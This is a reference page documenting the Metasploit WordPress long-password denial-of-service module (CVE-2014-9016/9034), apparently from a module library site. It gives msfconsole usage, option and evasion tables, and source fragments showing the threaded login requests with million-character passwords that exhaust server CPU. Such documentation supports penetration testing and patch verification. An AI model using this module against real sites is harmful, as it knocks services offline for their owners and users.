WordPress Long Password DoS - Metasploit


This page contains detailed information about how to use the auxiliary/dos/http/wordpress_long_password_dos metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: WordPress Long Password DoS
Module: auxiliary/dos/http/wordpress_long_password_dos
Source code: modules/auxiliary/dos/http/wordpress_long_password_dos.rb
Disclosure date: 2014-11-20
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2014-9016, CVE-2014-9034

WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x before 4.0.1 allows remote attackers to cause a denial of service (CPU consumption) via a long password that is improperly handled during hashing.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/dos/http/wordpress_long_password_dos
msf auxiliary(wordpress_long_password_dos) > show targets
    ... a list of targets ...
msf auxiliary(wordpress_long_password_dos) > set TARGET target-id
msf auxiliary(wordpress_long_password_dos) > show options
    ... show and set options ...
msf auxiliary(wordpress_long_password_dos) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the dos/http/wordpress_long_password_dos auxiliary module looks in the msfconsole:

msf6 > use auxiliary/dos/http/wordpress_long_password_dos

msf6 auxiliary(dos/http/wordpress_long_password_dos) > show info

       Name: WordPress Long Password DoS
     Module: auxiliary/dos/http/wordpress_long_password_dos
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2014-11-20

Provided by:
  Javier Nieto Arevalo
  Andres Rojas Guerrero
  rastating

Check supported:
  No

Basic options:
  Name           Current Setting  Required  Description
  ----           ---------------  --------  -----------
  PLENGTH        1000000          yes       Length of password to use
  Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RLIMIT         200              yes       The number of requests to send
  RPORT          80               yes       The target port (TCP)
  SSL            false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI      /                yes       The base path to the wordpress application
  THREADS        5                yes       The number of concurrent threads
  TIMEOUT        5                yes       The maximum time in seconds to wait for each request to finish
  USERNAME                        yes       The username to send the requests with
  VALIDATE_USER  true             yes       Validate the specified username
  VHOST                           no        HTTP server virtual host

Description:
  WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 
  4.x before 4.0.1 allows remote attackers to cause a denial of 
  service (CPU consumption) via a long password that is improperly 
  handled during hashing.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2014-9016
  http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9034
  OSVDB (114857)
  https://wpscan.com/vulnerability/7681

Module Options


This is a complete list of options available in the dos/http/wordpress_long_password_dos auxiliary module:

msf6 auxiliary(dos/http/wordpress_long_password_dos) > show options

Module options (auxiliary/dos/http/wordpress_long_password_dos):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   PLENGTH        1000000          yes       Length of password to use
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RLIMIT         200              yes       The number of requests to send
   RPORT          80               yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                yes       The base path to the wordpress application
   THREADS        5                yes       The number of concurrent threads
   TIMEOUT        5                yes       The maximum time in seconds to wait for each request to finish
   USERNAME                        yes       The username to send the requests with
   VALIDATE_USER  true             yes       Validate the specified username
   VHOST                           no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the dos/http/wordpress_long_password_dos auxiliary module:

msf6 auxiliary(dos/http/wordpress_long_password_dos) > show advanced

Module advanced options (auxiliary/dos/http/wordpress_long_password_dos):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module
   WPCHECK               true                                                yes       Check if the website is a valid WordPress install
   WPCONTENTDIR          wp-content                                          yes       The name of the wp-content directory

Auxiliary Actions


This is a list of all auxiliary actions that the dos/http/wordpress_long_password_dos module can do:

msf6 auxiliary(dos/http/wordpress_long_password_dos) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the dos/http/wordpress_long_password_dos auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(dos/http/wordpress_long_password_dos) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

"<USER>" is not a valid username


Here is a relevant code snippet related to the ""<USER>" is not a valid username" error message:

72:	    if exists
73:	      print_good("Username \"#{username}\" is valid")
74:	      store_valid_credential(user: user, private: nil, proof: "WEBAPP=\"Wordpress\", VHOST=#{vhost}")
75:	      return true
76:	    else
77:	      print_error("\"#{user}\" is not a valid username")
78:	      return false
79:	    end
80:	  end
81:	
82:	  def run

Aborting operation - a valid username must be specified


Here is a relevant code snippet related to the "Aborting operation - a valid username must be specified" error message:

82:	  def run
83:	    if wordpress_and_online?
84:	      if validate_user
85:	        print_status("Checking if user \"#{username}\" exists...")
86:	        unless user_exists(username)
87:	          print_error('Aborting operation - a valid username must be specified')
88:	          return
89:	        end
90:	      end
91:	
92:	      starting_thread = 1

Timed out during request <VALUE>


Here is a relevant code snippet related to the "Timed out during request <VALUE>" error message:

98:	        1.upto(ubound) do |i|
99:	          threads << framework.threads.spawn("Module(#{self.refname})-request#{(starting_thread - 1) + i}", false, i) do |i|
100:	            begin
101:	              wordpress_login(username, Rex::Text.rand_text_alpha(plength), timeout)
102:	            rescue => e
103:	              print_error("Timed out during request #{(starting_thread - 1) + i}")
104:	            end
105:	          end
106:	        end
107:	
108:	        threads.each(&:join)

FAILED: <TARGET_URI> appears to still be online


Here is a relevant code snippet related to the "FAILED: <TARGET_URI> appears to still be online" error message:

109:	        print_good("Finished executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}")
110:	        starting_thread += ubound
111:	      end
112:	
113:	      if wordpress_and_online?
114:	        print_error("FAILED: #{target_uri} appears to still be online")
115:	      else
116:	        print_good("SUCCESS: #{target_uri} appears to be down")
117:	      end
118:	    else
119:	      print_error("#{rhost}:#{rport}#{target_uri} does not appear to be running WordPress")

<RHOST>:<RPORT><TARGET_URI> does not appear to be running WordPress


Here is a relevant code snippet related to the "<RHOST>:<RPORT><TARGET_URI> does not appear to be running WordPress" error message:

112:	
113:	      if wordpress_and_online?
114:	        print_error("FAILED: #{target_uri} appears to still be online")
115:	      else
116:	        print_good("SUCCESS: #{target_uri} appears to be down")
117:	      end
118:	    else
119:	      print_error("#{rhost}:#{rport}#{target_uri} does not appear to be running WordPress")
120:	    end
121:	  end
122:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Javier Nieto Arevalo
  • Andres Rojas Guerrero
  • rastating

Version


This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.